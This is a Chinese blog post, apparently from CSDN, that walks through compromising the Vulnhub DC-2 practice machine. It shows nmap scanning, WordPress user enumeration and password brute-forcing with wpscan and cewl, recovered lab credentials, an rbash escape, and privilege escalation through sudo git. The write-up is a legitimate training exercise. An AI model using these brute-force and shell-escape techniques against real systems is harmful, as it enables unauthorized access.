靶场练习第十天~vulnhub靶场之dc-2

最新推荐文章于 2024-01-07 22:39:10 发布
最新推荐文章于 2024-01-07 22:39:10 发布
阅读量376 收藏
点赞数
分类专栏: # 靶机练习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122840614
版权

一、准备工作

靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86

二、信息收集

1.nmap的信息收集

(1)使用nmap 192.168.101.0/24,发现靶机地址为192.168.101.115

(2)对靶机做进一步探测,发现靶机开启了80和7744(SSH)端口: nmap -A -p- 192.168.101.115

(3)先从80端口寻找突破口,访问一下http://192.168.101.115 ,发现URL栏写的不是靶机的ip,而是http://dc-2/,而很明显,DNS没有解析出来

(4)回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件

(5)配置hosts文件

1.sudo vim /etc/hosts 2.在文件添加:192.168.101.115(靶机ip) dc-2

再次访问http://192.168.101.115,得到一些提示:

2.网站的信息收集

cewl是一个kali自带的密码生成工具

(6)使用cewl生成密码

命令:cewl -w dc2_passwords.txt http://dc-2

(7)确定是wordpress,使用wpscan工具进行扫描用户

命令1:wpscan --url http://dc-2 --enumerate u #暴力枚举用户名

或命令2:wpscan --ignore-main-redirect --url 192.168.:101.115 --enumerate u --force

扫描出三个用户:admin、tom和jerry。将三个用户写入dc2_user.txt中。

(8)利用得到用户密码的字典进行爆破

使用wpscan进行密码爆破,命令:wpscan --ignore-main-redirect --url 192.168.101.115 -U dc2_user.txt -P dc2_passwords.txt --force

Username: jerry, Password: adipiscing;Username: tom , Password: parturient

(9)尝试ssh远程登录,最终tom成功登录

命令:tom@192.168.101.115 -p 7744

三、渗透

(10)rbash绕过

1.输入whoami,发现事受限的shell命令,为rbash

2.绕过shell:先输入 BASH_CMDS[a]=/bin/sh;a ,再输入 /bin/bash

(11)使用并添加环境变量

PATH就是定义/bin:/sbin:/usr/bin等这些路径的变量,其中冒号为目录间的分割符。

可以查看flag3.txt的内容:

命令: export PATH=$PATH:/bin/

(12)切换Jerry用户:su jerry

flag4:

四、提权

(13)先查看一下自己能不能免密使用一些root级别的命令,恰好发现了git

(14)git提权

1.使用 sudo git help config;2.在最底下面输入 !/bin/bash;3.最后完成提权。

汉南帝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 390
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
vulnhub靶场 DC-2
weixin_52221158的博客
08-29 527
vulnhub靶场 DC-2
vulnhub靶场DC-2
qq_58091216的博客
01-07 943
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
vulnhub靶机:DC-2
Keepb1ue的博客
09-29 2609
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机:DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
vulnhub靶场DC-2
kukudeshuo的博客
07-10 296
vulnhub靶场DC-2 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 攻击机:kali(192.168.58.130) 靶机:DC-2(192.168.58.145) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.145 使用nmap扫描目标靶机端口开放情况 目标靶机开放端口:80、77
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Vulnhub靶场实战———DC2
m0_67309561的博客
05-02 285
Vulnhub靶场实战
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 1728
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场DC2靶机渗透】
qq_55213436的博客
07-12 546
大家好,又到了快乐的学习时光了,最近也是沉迷于DC系列的靶场,每一次成功拿下靶场后都会学习和总结到很多的东西。今天的受害者是DC-2靶场,话不多说,开整。献上靶场下载地址: https://download.vulnhub.com/dc/DC-2.zip信息收集nmap 收集主机信息: 尝试访问80端口:错误但是页面出现了dc-2,说明页面出现了重定向,需要修改hosts文件,添加具体的域名和IP地址。 再次访问: 发现网站的指纹信息如下: 使用工具wpscan获取cm......
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3820
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
网络安全学习笔记Day04--WEB源码,nmap扫描,靶场漏洞攻击实操
qq_53157982的博客
01-31 4018
WEB源码 目录结构 后台目录 模板目录 数据库目录 数据库配置文件 脚本类型 ASP,PHP,ASPX,JSP,javaWEB,python 应用分类 门户,电商,论坛,博客,第三方(查ip等),其他。。。 其他 框架和非框架,开源与否,源码获取 nmap探测开放端口 mysql身份绕过漏洞靶场实操 启动靶场 扫描靶场 探测到3306端口开放和数据库版本信息 利用metasploit漏洞框架查...
vulnhub靶机DC-2
cyzCc的博客
02-16 479
DC系列靶机2-9百度网盘下载链接链接:https://pan.baidu.com/s/1BHatml6HHnT-jsoZ-eHfsw 提取码:1xft 和DC1一样,先主机发现找到靶机的ip 使用nmap nmap -sP 192.168.211.0/24 根据MAC地址可以确定靶机的ip为192.168.211.134 然后扫描该ip所开放的端口服务 nmap -A 192.168.211....
linux子接口以及绑定网卡使用
魂醉的一亩二分地
12-04 3739
日常linux我们经常用到网卡的绑定以及子接口使用,记录一下相关操作 子接口使用:就是一块网卡绑定了多个ip地址,相对网卡绑定配置比较简单 1.临时配置,重启后失效 #ip addr  add 192.168.101.107/24 dev eth0 label eth0:1 2.永久配置,修改相关配置文件 #cp /etc/sysconfig/
vulnhub靶场 planets
08-28
- *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值